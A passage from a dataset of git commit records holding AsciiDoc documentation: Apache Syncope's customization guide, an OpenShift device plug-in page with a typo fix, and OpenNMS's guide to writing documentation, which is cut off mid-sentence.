`core\/pom.xml`:\n\n[source,xml,subs=\"verbatim,attributes\"]\n----\n<dependency>\n <groupId>org.apache.syncope.ext.camel<\/groupId>\n <artifactId>syncope-ext-camel-rest-cxf<\/artifactId>\n <version>${syncope.version}<\/version>\n<\/dependency>\n<dependency>\n <groupId>org.apache.syncope.ext.camel<\/groupId>\n <artifactId>syncope-ext-camel-persistence-jpa<\/artifactId>\n <version>${syncope.version}<\/version>\n<\/dependency>\n<dependency>\n <groupId>org.apache.syncope.ext.camel<\/groupId>\n <artifactId>syncope-ext-camel-provisioning<\/artifactId>\n <version>${syncope.version}<\/version>\n<\/dependency>\n----\n\nCopy `core\/src\/main\/resources\/all\/provisioning.properties` to `core\/src\/main\/resources\/provisioning.properties`.\n\n[discrete]\n===== Enable the <<swagger>> extension\n\nAdd the following dependency to `core\/pom.xml`:\n\n[source,xml,subs=\"verbatim,attributes\"]\n----\n<dependency>\n <groupId>org.apache.syncope.ext<\/groupId>\n <artifactId>syncope-ext-swagger-ui<\/artifactId>\n <version>${syncope.version}<\/version>\n<\/dependency>\n----\n\n[[customization-console]]\n==== Console\n\n[CAUTION]\nWhen providing custom Java classes implementing the defined interfaces or extending the existing\nimplementations, their package *must* be rooted under `org.apache.syncope.client.console`, otherwise they will not be\navailable at runtime.\n\n[discrete]\n===== Enable the <<apache-camel-provisioning-manager>>\n\nAdd the following dependency to `console\/pom.xml`:\n\n[source,xml,subs=\"verbatim,attributes\"]\n----\n<dependency>\n <groupId>org.apache.syncope.ext.camel<\/groupId>\n <artifactId>syncope-ext-camel-client-console<\/artifactId>\n <version>${syncope.version}<\/version>\n<\/dependency> \n----\n\n[[customization-enduser]]\n==== Enduser\n\nGiven the nature of the <<enduser-application>>, all the files required by the AngularJS-based frontend to run are\ngenerated under the local project's `enduser\/src\/main\/webapp\/app\/` directory and are available for full customization.\n\nThe files in use by the Apache Wicket-based backend are still subject to the general\n<<override-behavior,override behavior>>, instead.\n\n[[customization-extensions]]\n==== Extensions\n\n<<extensions>> can be part of a local project, to encapsulate special features which are specific to a given deployment.\n\nFor example, the http:\/\/www.chorevolution.eu\/[CHOReVOLUTION^] IdM - based on Apache Syncope - provides\nhttps:\/\/tuleap.ow2.org\/plugins\/git\/chorevolution\/syncope?p=syncope.git&a=tree&f=ext\/choreography[an extension^]\nfor managing via the <<core>> and visualizing via the <<admin-console-component>> the running choreography instances.\n","old_contents":"\/\/\n\/\/ Licensed to the Apache Software Foundation (ASF) under one\n\/\/ or more contributor license agreements. See the NOTICE file\n\/\/ distributed with this work for additional information\n\/\/ regarding copyright ownership. The ASF licenses this file\n\/\/ to you under the Apache License, Version 2.0 (the\n\/\/ \"License\"); you may not use this file except in compliance\n\/\/ with the License. You may obtain a copy of the License at\n\/\/\n\/\/ http:\/\/www.apache.org\/licenses\/LICENSE-2.0\n\/\/\n\/\/ Unless required by applicable law or agreed to in writing,\n\/\/ software distributed under the License is distributed on an\n\/\/ \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n\/\/ KIND, either express or implied. See the License for the\n\/\/ specific language governing permissions and limitations\n\/\/ under the License.\n\/\/\n=== Customization\n\n[CAUTION]\nOnly Maven projects can be customized: if using Standalone, Debian packages or the GUI installer, none of the\ncustomizations discussed below can be applied.\n\nApache Syncope is designed to be as flexible as possible, to best suit the various environments\nin which it can be deployed. Besides other aspects, this means that every feature and component can be extended or\nreplaced.\n\nOnce the project has been created from the provided Maven archetype, the generated source tree is available for either\nadding new features or replacing existing components.\n\n[[override-behavior]]\n[TIP]\n.Override behavior\n====\nAs a rule of thumb, any file of the local project will take precedence over a file with the same name in the same\ndirectory of the standard Apache Syncope release.\n\nFor example, if you place\n\n core\/spring\/src\/main\/java\/org\/apache\/syncope\/core\/spring\/security\/SyncopeAuthenticationProvider.java\n\nin the local project, this file will be picked up instead of\nifeval::[\"{snapshotOrRelease}\" == \"release\"]\nhttps:\/\/github.com\/apache\/syncope\/blob\/syncope-{docVersion}\/core\/spring\/src\/main\/java\/org\/apache\/syncope\/core\/spring\/security\/SyncopeAuthenticationProvider.java[SyncopeAuthenticationProvider^].\nendif::[]\nifeval::[\"{snapshotOrRelease}\" == \"snapshot\"]\nhttps:\/\/github.com\/apache\/syncope\/blob\/master\/core\/spring\/src\/main\/java\/org\/apache\/syncope\/core\/spring\/security\/SyncopeAuthenticationProvider.java[SyncopeAuthenticationProvider^].\nendif::[]\n\nThe same happens with resources as images or HTML files; if you place\n\n console\/src\/main\/resources\/org\/apache\/syncope\/client\/console\/pages\/BasePage.html\n\nin the local project, this file will be picked up instead of\nifeval::[\"{snapshotOrRelease}\" == \"release\"]\nhttps:\/\/github.com\/apache\/syncope\/blob\/syncope-{docVersion}\/client\/console\/src\/main\/resources\/org\/apache\/syncope\/client\/console\/pages\/BasePage.html[BasePage.html^].\nendif::[]\nifeval::[\"{snapshotOrRelease}\" == \"snapshot\"]\nhttps:\/\/github.com\/apache\/syncope\/blob\/master\/client\/console\/src\/main\/resources\/org\/apache\/syncope\/client\/console\/pages\/BasePage.html[BasePage.html^].\nendif::[]\n\nThis general behavior might have exceptions, as highlighted below.\n====\n\nIn general, the Embedded Mode (see the\nifeval::[\"{backend}\" == \"html5\"]\nhttp:\/\/syncope.apache.org\/docs\/getting-started.html[Apache Syncope Getting Started Guide]\nendif::[]\nifeval::[\"{backend}\" == \"pdf\"]\nhttp:\/\/syncope.apache.org\/docs\/getting-started.pdf[Apache Syncope Getting Started Guide]\nendif::[]\nfor details) allows the user to work comfortably from a single workstation, with no need of additional setup; it is\neffectively implemented as the `all`\nhttps:\/\/maven.apache.org\/guides\/introduction\/introduction-to-profiles.html[Maven profile^], where the available optional\ncomponents and extensions are enabled. +\nWhen deploying the generated WAR artifacts into an external <<javaee-container>> however, the required components and\nextensions need to be explicitly selected and enabled, as shown in the following text.\n\n[[deployment-directories]]\n.Deployment directories\n****\nApache Syncope needs three base directories to be defined:\n\n* bundles - where the <<external-resources,connector bundles>> are stored;\n* log - where all the system logs are written;\n* conf (optional) - where configuration files are located, if overriding the default values is needed.\n\n[WARNING]\nThe `bundles` directory should only contain connector bundle JAR files. +\nThe presence of any other file might cause the unavailability of any connector bundle in Apache Syncope.\n\nFor reference, the suggested directory layout can be created as follows:\n\n....\n$ mkdir \/opt\/syncope\n$ mkdir \/opt\/syncope\/bundles\n$ mkdir \/opt\/syncope\/log\n$ mkdir \/opt\/syncope\/conf\n....\n****\n\nThe WAR artifacts are generated by running the Maven command (with reference to the suggested directory layout):\n\n....\nmvn clean verify \\\n -Dconf.directory=\/opt\/syncope\/conf \\\n -Dbundles.directory=\/opt\/syncope\/bundles \\\n -Dlog.directory=\/opt\/syncope\/log\n....\n\nAfter downloading all of the dependencies that are needed, three WAR files will be produced:\n\n. `core\/target\/syncope.war`\n. `console\/target\/syncope-console.war`\n. `enduser\/target\/syncope-enduser.war`\n\nIf no failures are encountered, your basic Apache Syncope project is now ready to be deployed.\n\n[[embedded-debug]]\n[TIP]\n.JPDA Debug in Embedded Mode\n====\nThe Java\u2122 Platform Debugger Architecture (http:\/\/docs.oracle.com\/javase\/8\/docs\/technotes\/guides\/jpda\/index.html[JPDA^])\nis a collection of APIs aimed to help with debugging Java code.\n\nEnhancing the `embedded` profile of the `enduser` module to enable the JPDA socket is quite\nstraightforward: just add the `<profile>` below to `enduser\/pom.xml`:\n\n[source,xml,subs=\"verbatim,attributes\"]\n----\n<profile>\n <id>debug<\/id>\n\n <build>\n <plugin>\n <plugin>\n <groupId>org.codehaus.cargo<\/groupId>\n <artifactId>cargo-maven2-plugin<\/artifactId>\n <inherited>true<\/inherited>\n <configuration>\n <configuration>\n <properties>\n <cargo.jvmargs>\n -Xdebug\n -Xrunjdwp:transport=dt_socket,address=8000,server=y,suspend=n\n -noverify -XX:+CMSClassUnloadingEnabled\n -XX:+UseConcMarkSweepGC -Xmx1024m -Xms512m\n <\/cargo.jvmargs>\n <\/properties>\n <\/configuration>\n <\/configuration>\n <\/plugin>\n <\/plugins>\n <\/build>\n<\/profile>\n----\n\nNow, from the `enduser` subdirectory, execute:\n\n[source,bash]\nmvn -P embedded,debug\n\nAt this point your favorite IDE can be attached to the port `8000`; please note that you might need to add\n`-XX:MaxPermSize=512m` to `<cargo.jvmargs>` in order to run with JDK 7.\n====\n\n[[customization-core]]\n==== Core\n\n[CAUTION]\nWhen providing custom Java classes implementing the defined interfaces or extending the existing\nimplementations, their package *must* be rooted under `org.apache.syncope.core`, otherwise they will not be available\nat runtime.\n\nBesides replacing existing classes as explained <<override-behavior,above>>, new implementations can be provided under\n`core\/src\/main\/java` for the following components:\n\n* <<propagationactions,propagation>>, <<pushactions,push>>, <<pullactions,pull>> and <<logicactions,logic>> actions\n* <<push-correlation-rules,push>> \/ <<pull-correlation-rules,pull>> correlation rules\n* <<pull-mode,reconciliation filter builders>>\n* <<tasks-custom,custom tasks>>\n* <<reportlets,reportlets>>\n* <<account-rules,account>> and <<password-rules,password>> rules for policies\n* <<plain,plain schema validators>>\n* <<mapping,mapping item transformers>>\n* <<virtual-attribute-cache,virtual attribute cache>>\n* <<workflow-adapters,workflow adapters>>\n* <<provisioning-managers,provisioning managers>>\n* <<notifications,notification recipient providers>>\n\n[[new-rest-endpoints]]\n[TIP]\n.New REST endpoints\n====\nAdding a new REST endpoint involves several operations:\n\n. create - in an extension's `rest-api` module or under `common` otherwise - a Java interface with package\n`org.apache.syncope.common.rest.api.service` and proper JAX-RS annotations; check\nifeval::[\"{snapshotOrRelease}\" == \"release\"]\nhttps:\/\/github.com\/apache\/syncope\/blob\/syncope-{docVersion}\/ext\/camel\/rest-api\/src\/main\/java\/org\/apache\/syncope\/common\/rest\/api\/service\/CamelRouteService.java[CamelRouteService^]\nendif::[]\nifeval::[\"{snapshotOrRelease}\" == \"snapshot\"]\nhttps:\/\/github.com\/apache\/syncope\/blob\/master\/ext\/camel\/rest-api\/src\/main\/java\/org\/apache\/syncope\/common\/rest\/api\/service\/CamelRouteService.java[CamelRouteService^]\nendif::[]\nfor reference;\n. if needed, define supporting payload objects - in an extension's `common-lib` module or under `common` otherwise;\ncheck\nifeval::[\"{snapshotOrRelease}\" == \"release\"]\nhttps:\/\/github.com\/apache\/syncope\/blob\/syncope-{docVersion}\/ext\/camel\/common-lib\/src\/main\/java\/org\/apache\/syncope\/common\/lib\/to\/CamelRouteTO.java[CamelRouteTO^]\nendif::[]\nifeval::[\"{snapshotOrRelease}\" == \"snapshot\"]\nhttps:\/\/github.com\/apache\/syncope\/blob\/master\/ext\/camel\/common-lib\/src\/main\/java\/org\/apache\/syncope\/common\/lib\/to\/CamelRouteTO.java[CamelRouteTO^]\nendif::[]\nfor reference;\n. implement - in an extension's `rest-cxf` module or under `core` otherwise - the interface defined above in a Java\nclass with package `org.apache.syncope.core.rest.cxf.service`; check\nifeval::[\"{snapshotOrRelease}\" == \"release\"]\nhttps:\/\/github.com\/apache\/syncope\/blob\/syncope-{docVersion}\/ext\/camel\/rest-cxf\/src\/main\/java\/org\/apache\/syncope\/core\/rest\/cxf\/service\/CamelRouteServiceImpl.java[CamelRouteServiceImpl^]\nendif::[]\nifeval::[\"{snapshotOrRelease}\" == \"snapshot\"]\nhttps:\/\/github.com\/apache\/syncope\/blob\/master\/ext\/camel\/rest-cxf\/src\/main\/java\/org\/apache\/syncope\/core\/rest\/cxf\/service\/CamelRouteServiceImpl.java[CamelRouteServiceImpl^]\nendif::[]\nfor reference.\n\nBy following such conventions, the new REST endpoint will be automatically picked up alongside the default services.\n====\n\n[WARNING]\n====\nThe <<override-behavior,override behavior>> might have exceptions; if you need to customize one of the\nSpring context definitions. For example, if you want to customize \nifeval::[\"{snapshotOrRelease}\" == \"release\"]\nhttps:\/\/github.com\/apache\/syncope\/blob\/syncope-{docVersion}\/core\/spring\/src\/main\/resources\/securityContext.xml[securityContext.xml^]\nendif::[]\nifeval::[\"{snapshotOrRelease}\" == \"snapshot\"]\nhttps:\/\/github.com\/apache\/syncope\/blob\/master\/core\/spring\/src\/main\/resources\/securityContext.xml[securityContext.xml^]\nendif::[]\n, you will also need to replace the following text in `core\/src\/main\/webapp\/WEB-INF\/web.xml`,\n\n....\nclasspath*:\/*Context.xml\n....\n\nwith\n\n....\nclasspath:\/coreContext.xml\nclasspath:\/securityContext.xml\nclasspath*:\/logicContext.xml\nclasspath*:\/restCXFContext.xml\nclasspath*:\/persistenceContext.xml\nclasspath*:\/provisioningContext.xml\nclasspath*:\/workflowContext.xml\n....\n\nto be sure that `core\/src\/main\/resources\/securityContext.xml` is picked up. +\nPlease also note that the actual list of Spring context files to include might depend on the configured extensions.\n====\n\n[discrete]\n===== Select the <<activiti-user-workflow-adapter>>\n\nAdd the following dependency to `core\/pom.xml`:\n\n[source,xml,subs=\"verbatim,attributes\"]\n----\n<dependency>\n <groupId>org.apache.syncope.core<\/groupId>\n <artifactId>syncope-core-workflow-activiti<\/artifactId>\n <version>${syncope.version}<\/version>\n<\/dependency>\n----\n\nCopy `core\/src\/main\/resources\/all\/workflow.properties` to `core\/src\/main\/resources\/workflow.properties`.\n\n[discrete]\n===== Enable the <<apache-camel-provisioning-manager>>\n\nAdd the following dependencies to `core\/pom.xml`:\n\n[source,xml,subs=\"verbatim,attributes\"]\n----\n<dependency>\n <groupId>org.apache.syncope.ext.camel<\/groupId>\n <artifactId>syncope-ext-camel-rest-cxf<\/artifactId>\n <version>${syncope.version}<\/version>\n<\/dependency>\n<dependency>\n <groupId>org.apache.syncope.ext.camel<\/groupId>\n <artifactId>syncope-ext-camel-persistence-jpa<\/artifactId>\n <version>${syncope.version}<\/version>\n<\/dependency>\n<dependency>\n <groupId>org.apache.syncope.ext.camel<\/groupId>\n <artifactId>syncope-ext-camel-provisioning<\/artifactId>\n <version>${syncope.version}<\/version>\n<\/dependency>\n----\n\nCopy `core\/src\/main\/resources\/all\/provisioning.properties` to `core\/src\/main\/resources\/provisioning.properties`.\n\n[discrete]\n===== Enable the <<swagger>> extension\n\nAdd the following dependency to `core\/pom.xml`:\n\n[source,xml,subs=\"verbatim,attributes\"]\n----\n<dependency>\n <groupId>org.apache.syncope.ext<\/groupId>\n <artifactId>syncope-ext-swagger-ui<\/artifactId>\n <version>${syncope.version}<\/version>\n<\/dependency>\n----\n\n[[customization-console]]\n==== Console\n\n[CAUTION]\nWhen providing custom Java classes implementing the defined interfaces or extending the existing\nimplementations, their package *must* be rooted under `org.apache.syncope.client.console`, otherwise they will not be\navailable at runtime.\n\n[discrete]\n===== Enable the <<apache-camel-provisioning-manager>>\n\nAdd the following dependency to `console\/pom.xml`:\n\n[source,xml,subs=\"verbatim,attributes\"]\n----\n<dependency>\n <groupId>org.apache.syncope.ext.camel<\/groupId>\n <artifactId>syncope-ext-camel-client-console<\/artifactId>\n <version>${syncope.version}<\/version>\n<\/dependency> \n----\n\n[[customization-enduser]]\n==== Enduser\n\nGiven the nature of the <<enduser-application>>, all the files required by the AngularJS-based frontend to run are\ngenerated under the local project's `enduser\/src\/main\/webapp\/app\/` directory and are available for full customization.\n\nThe files in use by the Apache Wicket-based backend are still subject to the general\n<<override-behavior,override behavior>>, instead.\n\n[[customization-extensions]]\n==== Extensions\n\n<<extensions>> can be part of a local project, to encapsulate special features which are specific to a given deployment.\n\nFor example, the http:\/\/www.chorevolution.eu\/[CHOReVOLUTION^] IdM - based on Apache Syncope - provides\nhttps:\/\/tuleap.ow2.org\/plugins\/git\/chorevolution\/syncope?p=syncope.git&a=tree&f=ext\/choreography[an extension^]\nfor managing via the <<core>> and visualizing via the <<admin-console-component>> the running choreography instances.\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"e54c5101184547bfe423fe5e6aac8a54b9403cc5","subject":"Fix typo","message":"Fix typo\n\n- https:\/\/github.com\/openshift\/openshift-docs\/issues\/21094\n","repos":"vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs","old_file":"nodes\/pods\/nodes-pods-plugins.adoc","new_file":"nodes\/pods\/nodes-pods-plugins.adoc","new_contents":":context: nodes-pods-device\n[id=\"nodes-pods-device\"]\n= Using device plug-ins to access external resources with pods\ninclude::modules\/common-attributes.adoc[]\n\ntoc::[]\n\n\nDevice plug-ins allow you to use a particular device type (GPU, InfiniBand,\nor other similar computing resources that require vendor-specific initialization\nand setup) in your {product-title} pod without needing to write custom code. \n\n\n\/\/ The following include statements pull in the module files that comprise\n\/\/ the assembly. Include any combination of concept, procedure, or reference\n\/\/ modules required to cover the user story. You can also include other\n\/\/ assemblies.\n\ninclude::modules\/nodes-pods-plugins-about.adoc[leveloffset=+1]\n\ninclude::modules\/nodes-pods-plugins-device-mgr.adoc[leveloffset=+1]\n\ninclude::modules\/nodes-pods-plugins-install.adoc[leveloffset=+1]\n\n","old_contents":":context: nodes-pods-device\n[id=\"nodes-pods-device\"]\n= Using device plug-ins to access external resouces with pods\ninclude::modules\/common-attributes.adoc[]\n\ntoc::[]\n\n\nDevice plug-ins allow you to use a particular device type (GPU, InfiniBand,\nor other similar computing resources that require vendor-specific initialization\nand setup) in your {product-title} pod without needing to write custom code. \n\n\n\/\/ The following include statements pull in the module files that comprise\n\/\/ the assembly. Include any combination of concept, procedure, or reference\n\/\/ modules required to cover the user story. You can also include other\n\/\/ assemblies.\n\ninclude::modules\/nodes-pods-plugins-about.adoc[leveloffset=+1]\n\ninclude::modules\/nodes-pods-plugins-device-mgr.adoc[leveloffset=+1]\n\ninclude::modules\/nodes-pods-plugins-install.adoc[leveloffset=+1]\n\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"535e83bb7000ab32d5af50c5460696fa806c2100","subject":"Replaced all the neo4j stuff","message":"Replaced all the neo4j stuff\n","repos":"roskens\/opennms-pre-github,aihua\/opennms,tdefilip\/opennms,aihua\/opennms,roskens\/opennms-pre-github,rdkgit\/opennms,roskens\/opennms-pre-github,tdefilip\/opennms,aihua\/opennms,roskens\/opennms-pre-github,rdkgit\/opennms,rdkgit\/opennms,roskens\/opennms-pre-github,roskens\/opennms-pre-github,roskens\/opennms-pre-github,roskens\/opennms-pre-github,tdefilip\/opennms,rdkgit\/opennms,rdkgit\/opennms,rdkgit\/opennms,aihua\/opennms,tdefilip\/opennms,rdkgit\/opennms,tdefilip\/opennms,aihua\/opennms,tdefilip\/opennms,tdefilip\/opennms,roskens\/opennms-pre-github,aihua\/opennms,rdkgit\/opennms,aihua\/opennms,aihua\/opennms,aihua\/opennms,rdkgit\/opennms,roskens\/opennms-pre-github,tdefilip\/opennms,rdkgit\/opennms,tdefilip\/opennms,roskens\/opennms-pre-github","old_file":"opennms-doc\/doc-overview\/src\/asciidoc\/overview.adoc","new_file":"opennms-doc\/doc-overview\/src\/asciidoc\/overview.adoc","new_contents":"= Documentation Overview\n\/\/ Authors, seperated by;. They might not be shown in the overview but will be generated\nRonny Trommer <ronny@opennms.org>; Markus von R\u00fcden <mvr@opennms.com>\n:ascii-ids:\n\n[[community-docs]]\n== Writing OpenNMS Documentation\n\nNOTE: Other than writing documentation, you can help out by providing comments about improvements or reporting bugs - head over to the http:\/\/issues.opennms.org\/browse\/NMS\/component\/10011[issue tracker for documentation] to do that!\n\nFor how to build the manual see:\nhttps:\/\/github.com\/OpenNMS\/opennms\/blob\/development\/docs\/opennms-doc\/doc-overview\/README.adoc[readme]\n\nThe documents use the AsciiDoc format, see:\n\n* http:\/\/www.methods.co.nz\/asciidoc\/[Aciidoc Reference]\n* http:\/\/www.methods.co.nz\/asciidoc\/faq.html[AsciiDoc FAQ]\n* http:\/\/powerman.name\/doc\/asciidoc[AsciiDoc cheatsheet]\n* http:\/\/xpt.sourceforge.net\/techdocs\/nix\/tool\/asciidoc-syn\/ascs01-AsciiDocMarkupSyntaxQuickSummary\/single\/[AsciiDoc Cheatsheet]\n\nHere you can find other resources to get familiar with AsciiDoc, see:\n\n * http:\/\/asciidoctor.org\/docs\/user-manual[AsciiDoc User Manual]\n * http:\/\/asciidoctor.org\/docs\/install-and-use-asciidoctor-maven-plugin\/[AsciiDoc Maven Plugin]\n * https:\/\/groups.google.com\/forum\/?fromgroups#!forum\/asciidoc[AsciiDoc discussion list]\n * http:\/\/code.google.com\/p\/asciidoc\/issues\/list[AsciiDoc issue tracker]\n * https:\/\/github.com\/oreillymedia\/docbook2asciidoc[Docbook to AsciiDoc]\n * http:\/\/blog.rainwebs.net\/2010\/02\/25\/how-to-create-handsome-pdf-documents-without-frustration\/[How to create handsome PDF documents without frustration]\n\nThe cheatsheets are really useful!\n\n[[community-docs-overall-flow]]\n== Overall Flow ==\n\nEach (sub)project represents a part of the documentation, which will produce a HTML output in the file system.\nThe output is generated in the `target\/generated` sources folder.\nAsciidoc documents have the +.asciidoc+ file extension.\n\nNote that different ways to add documentation works best for different cases:\n\n* Tutorials and How To's should be published on the http:\/\/wiki.opennms.org[OpenNMS Wiki].\nFor example you want to describe how to use the Net-SNMP agent and the SNMP monitor from OpenNMS to solve a special use case with OpenNMS.\n\n* The documentation you can find in the source code can be characterized as a non-emotional technical documentation which explains concepts in detail and should be complete.\n\n== File Structure in 'opennms-doc' ==\n\n[options=\"header\", cols=\"e,d\"]\n|========================\n| Directory | Contents\n| doc-overview\/ | module with this overview documentation\n| guide-user\/ | module with the guide for people how to use and configure OpenNMS\n| guide-admin\/ | module with the guide for administrators optimizing and running OpenNMS\n| guide-development\/ | module with the guide for people who want to develop within OpenNMS\n| guide-install\/ | module with the guide how to install OpenNMS on different operating systems\n| releasenotes\/ | module with the changelog and release notes\n|========================\n\n== Headings and document structure ==\n\nEach document starts over with headings from level zero (the document title).\nEach document should have an id.\nIn some cases sections in the document need to have id's as well, this depends on where they fit in the overall structure.\nTo be able to link to content, it has to have an id. Missing id's in mandatory places will fail the build.\n\nThis is how a document should start:\n\n[source]\n----\n[[unique-id-verbose-is-ok]]\n= The Document Title =\n----\n\nTo push the headings down to the right level in the output, the +leveloffset+\nattribute is used when including the document inside of another document.\n\nSubsequent headings in a document should use the following syntax:\n\n[source]\n----\n== Subheading ==\n\n... content here ...\n\n=== Subsubheading ===\n\ncontent here ...\n\n----\n\n== Writing ==\n\nPut one sentence on each line.\nThis makes it easy to move content around, and also easy to spot (too) long sentences.\n\n== Gotchas ==\n\n* Always leave a blank line at the end of documents\n (or the title of the next document might end up in the last\n paragraph of the document)\n* As +{}+ are used for Asciidoc attributes, everything inside will be treated as an attribute.\n What you have to do is to escape the opening brace: +\\\\{+.\n If you don't, the braces and the text inside them will be removed without any warning being issued!\n\n== Links ==\n\nTo link to other parts of the manual the id of the target is used.\nThis is how such a reference looks:\n\n[source]\n----\n<<community-docs-overall-flow>>\n----\n\nWhich will render like: <<community-docs-overall-flow>>\n\n[NOTE]\nJust write \"see \\<<target-id>>\" and similar, that should suffice in most cases.\n\nIf you need to link to another document with your own link text, this is what to do:\n\n[source]\n----\n<<target-id, link text that fits in the context>>\n----\n\nNOTE: Having lots of linked text may work well in a web context but is a pain in print, and we aim for both!\n\nExternal links are added like this:\n\n[source]\n----\nhttp:\/\/www.opennms.org\/[Link text here]\n----\n\nWhich renders like: http:\/\/www.opennms.org\/[Link text here]\n\nFor short links it may be better not to add a link text, just do:\n\n[source]\n----\nhttp:\/\/www.opennms.org\/\n----\n\nWhich renders like: http:\/\/www.opennms.org\/\n\nNOTE: It's ok to have a dot right after the URL, it won't be part of the link.\n\n== Text Formatting ==\n\n* \\_Italics_ is rendered as _Italics_ and used for emphasis.\n* \\*Bold* is rendered as *Bold* and used sparingly, for strong emphasis only.\n* \\+methodName()+ is rendered as +methodName()+ and is used for literals as well\n (note: the content between the `+` signs _will_ be parsed).\n* \\`command` is rendered as `command` (typically used for command-line)\n (note: the content between the +`+ signs _will not_ be parsed).\n* Mono\\+\\+space\\++d is rendered as Mono++space++d and is used for monospaced letters.\n* \\'my\/path\/' is rendered as 'my\/path\/' (used for file names and paths).\n* \\\\``Double quoted'' (that is two grave accents to the left and two acute accents to the right) renders as ``Double quoted''.\n* \\`Single quoted' (that is a single grave accent to the left and a single acute accent to the right) renders as `Single quoted'.\n\n== Admonitions ==\n\nThese are very useful and should be used where appropriate.\nChoose from the following (write all caps and no, we can't easily add new ones):\n\nNOTE: Note.\n\nTIP: Tip.\n\nIMPORTANT: Important\n\nCAUTION: Caution\n\nWARNING: Warning\n\nHere's how it's done:\n\n[source]\n----\nNOTE: Note.\n----\n\nA multiline variation:\n\n[source]\n----\n[TIP]\nTiptext.\nLine 2.\n----\n\nWhich is rendered as:\n\n[TIP]\nTiptext.\nLine 2.\n\n== Images ==\n\nIMPORTANT: _All images in the entire manual share the same namespace._\n You know how to handle that.\n\n=== Images Files ===\n\nTo include an image file, make sure it resides in the 'images\/' directory relative to the document you're including it from. Then go:\n\n[source]\n----\nimage::opennms-logo.png[]\n----\n\nWhich is rendered as:\n\nimage::opennms-logo.png[]\n\n=== Static Graphviz\/DOT ===\n\nWe use the Graphviz\/DOT language to describe graphs.\nFor documentation see http:\/\/graphviz.org\/.\n\nThis is how to include a simple example graph:\n\n[source]\n----\n [\"dot\", \"community-docs-graphdb-rels.svg\"]\n ----\n \"Start node\" -> \"End node\" [label=\"relationship\"]\n ----\n----\n\nWhich is rendered as:\n\n[\"dot\", \"community-docs-graphdb-rels.svg\"]\n----\n\"Start node\" -> \"End node\" [label=\"relationship\"]\n----\n\nHere's an example using some predefined variables available in the build:\n\n[source]\n----\n [\"dot\", \"community-docs-graphdb-rels-overview.svg\", \"meta\"]\n ----\n \"A Relationship\" [fillcolor=\"NODEHIGHLIGHT\"]\n \"Start node\" [fillcolor=\"NODE2HIGHLIGHT\"]\n \"A Relationship\" -> \"Start node\" [label=\"has a\"]\n \"A Relationship\" -> \"End node\" [label=\"has a\"]\n \"A Relationship\" -> \"Relationship type\" [label=\"has a\"]\n \"Name\" [TEXTNODE]\n \"Relationship type\" -> \"Name\" [label=\"uniquely identified by\" color=\"EDGEHIGHLIGHT\" fontcolor=\"EDGEHIGHLIGHT\"]\n ----\n----\n\nWhich is rendered as:\n\n[\"dot\", \"community-docs-graphdb-rels-overview.svg\", \"meta\"]\n----\n\"A Relationship\" [fillcolor=\"NODEHIGHLIGHT\"]\n\"Start node\" [fillcolor=\"NODE2HIGHLIGHT\"]\n\"A Relationship\" -> \"Start node\" [label=\"has a\"]\n\"A Relationship\" -> \"End node\" [label=\"has a\"]\n\"A Relationship\" -> \"Relationship type\" [label=\"has a\"]\n\"Name\" [TEXTNODE]\n\"Relationship type\" -> \"Name\" [label=\"uniquely identified by\" color=\"EDGEHIGHLIGHT\" fontcolor=\"EDGEHIGHLIGHT\"]\n----\n\nThe optional second argument given to the dot filter defines the style to use:\n\n* when not defined: Default styling for nodespace examples.\n* +neoviz+: Nodespace view generated by Neoviz.\n* +meta+: Graphs that don't resemble db contents, but rather concepts.\n\nCAUTION: Keywords of the DOT language have to be surrounded by double quotes when used for other purposes.\n The keywords include _node, edge, graph, digraph, subgraph,_ and _strict_.\n\n\n== Attributes ==\n\nCommon attributes you can use in documents:\n\n* \\{opennms-version} - rendered as \"{opennms-version}\"\n* \\{opennms-git-tag} - rendered as \"{opennms-git-tag}\"\n\nThese can substitute part of URLs that point to for example APIdocs or source code.\nNote that opennms-git-tag also handles the case of snapshot\/master.\n\nSample Asciidoc attributes which can be used:\n\n* \\{docdir} - root directory of the documents\n* \\{nbsp} - non-breaking space\n\n== Comments ==\n\nThere's a separate build including comments.\nThe comments show up with a yellow background.\nThis build doesn't run by default, but after a normal build, you can use `make annotated` to build it.\nYou can also use the resulting page to search for content, as the full manual is on a single page.\n\nHere's how to write a comment:\n\n[source]\n----\n\/\/ this is a comment\n----\n\nThe comments are not visible in the normal build.\nComment blocks won't be included in the output of any build at all.\nHere's a comment block:\n\n[source]\n----\n\/\/\/\/\nNote that includes in here will still be processed, but not make it into the output.\nThat is, missing includes here will still break the build!\n\/\/\/\/\n----\n\n== Code Snippets ==\n\n=== Explicitly defined in the document ===\n\nWARNING: Use this kind of code snippets as little as possible.\n They are well known to get out of sync with reality after a while.\n\nThis is how to do it:\n\n[source,xml]\n----\n<service name=\"DNS\" interval=\"300000\" user-defined=\"false\" status=\"on\">\n <parameter key=\"retry\" value=\"2\" \/>\n <parameter key=\"timeout\" value=\"5000\" \/>\n <parameter key=\"port\" value=\"53\" \/>\n <parameter key=\"lookup\" value=\"localhost\" \/>\n <parameter key=\"fatal-response-codes\" value=\"2,3,5\" \/><!-- ServFail, NXDomain, Refused -->\n <parameter key=\"rrd-repository\" value=\"\/opt\/opennms\/share\/rrd\/response\" \/>\n <parameter key=\"rrd-base-name\" value=\"dns\" \/>\n <parameter key=\"ds-name\" value=\"dns\" \/>\n<\/service>\n----\n\nIf there's no suitable syntax highlighter, just omit the language: +[source]+.\n\nCurrently the following syntax highlighters are enabled:\n\n* Bash\n* Groovy\n* Java\n* JavaScript\n* Python\n* XML\n\nFor other highlighters we could add see https:\/\/code.google.com\/p\/google-code-prettify\/.\n\n=== Fetched from source code ===\n\nCode can be automatically fetched from source files.\nYou need to define:\n\n* component: the +artifactId+ of the Maven coordinates,\n* source: path to the file inside the jar it's deployed to,\n* classifier: +sources+ or +test-sources+ or any other classifier pointing to the artifact,\n* tag: tag name to search the file for,\n* the language of the code, if a corresponding syntax highlighter is available.\n\nNote that the artifact has to be included as a Maven dependency of the Manual project so that the files can be found.\n\nThe file will be searched for lines including +START SNIPPET: {tag}+ and +END SNIPPET: {tag}+, the lines between those will go into the output.\nBe aware of that the tag \"abc\" will match \"abcd\" as well.\nIt's a simple on\/off switch, meaning that multiple occurrences will be assembled into a single code snippet in the output.\nThis behavior 